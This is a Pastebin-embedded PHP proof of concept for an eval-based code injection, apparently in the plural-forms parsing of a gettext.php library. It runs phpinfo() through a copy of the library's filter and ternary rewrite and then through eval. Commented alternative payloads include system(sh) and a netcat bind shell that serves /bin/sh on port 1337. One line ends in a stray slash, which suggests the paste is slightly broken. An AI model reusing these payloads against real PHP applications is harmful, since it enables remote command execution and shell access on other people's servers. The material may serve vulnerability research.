document.write('
Data hosted with ♥ by Pastebin.com - Download Raw - See Original
  1. <?php
  2. //$expr= ("system(sh)");  // payload1
  3. //$expr= (`nc -l -p 1337 -e /bin/sh`); // payload that is not eval-dependant
  4. $expr=("phpinfo()"); // payload2 (PoC)
  5.  
  6. //$expr = preg_replace(\'@[^a-zA-Z0-9_:;\\(\\)\\?\\|\\&=!<>+*/\\%-]@\', \'\', $expr);//  vuln
  7. $expr = preg_replace(\'@[^a-zA-Z0-9_:;\\(\\)\\?\\|\\&=!<>+*/\\%-]@\', \'\', $expr);/
  8.  
  9. $expr .= \';\';
  10.  
  11.  // Add parenthesis for tertiary \'?\' operator.
  12. $expr .= \';\';
  13. $res = \'\';
  14. $p = 0;
  15. for ($i = 0; $i < strlen($expr); $i++) {
  16.     $ch = $expr[$i];
  17.     switch ($ch) {
  18.         case \'?\':
  19.             $res .= \' ? (\';
  20.             $p++;
  21.             break;
  22.         case \':\':
  23.             $res .= \') : (\';
  24.             break;
  25.         case \';\':
  26.             $res .= str_repeat( \')\', $p) . \';\';
  27.             $p = 0;
  28.             break;
  29.     default:
  30.         $res .= $ch;
  31.     }
  32. }
  33.    
  34. // Vulnerable function :
  35. $n= (1);
  36. $total=("1000");
  37.  
  38.  if (!is_int($n)) {
  39.       throw new InvalidArgumentException(
  40.         "Select_string only accepts integers: " . $n); // test sur la version 2 de gettext.php
  41. }
  42.  
  43. $string = str_replace(\'nplurals\',"\\$total",$res);
  44. $string = str_replace("n",$res,$res);
  45. $string = str_replace(\'plural\',"\\$plural",$res);
  46. eval("$string");
  47. ?>
');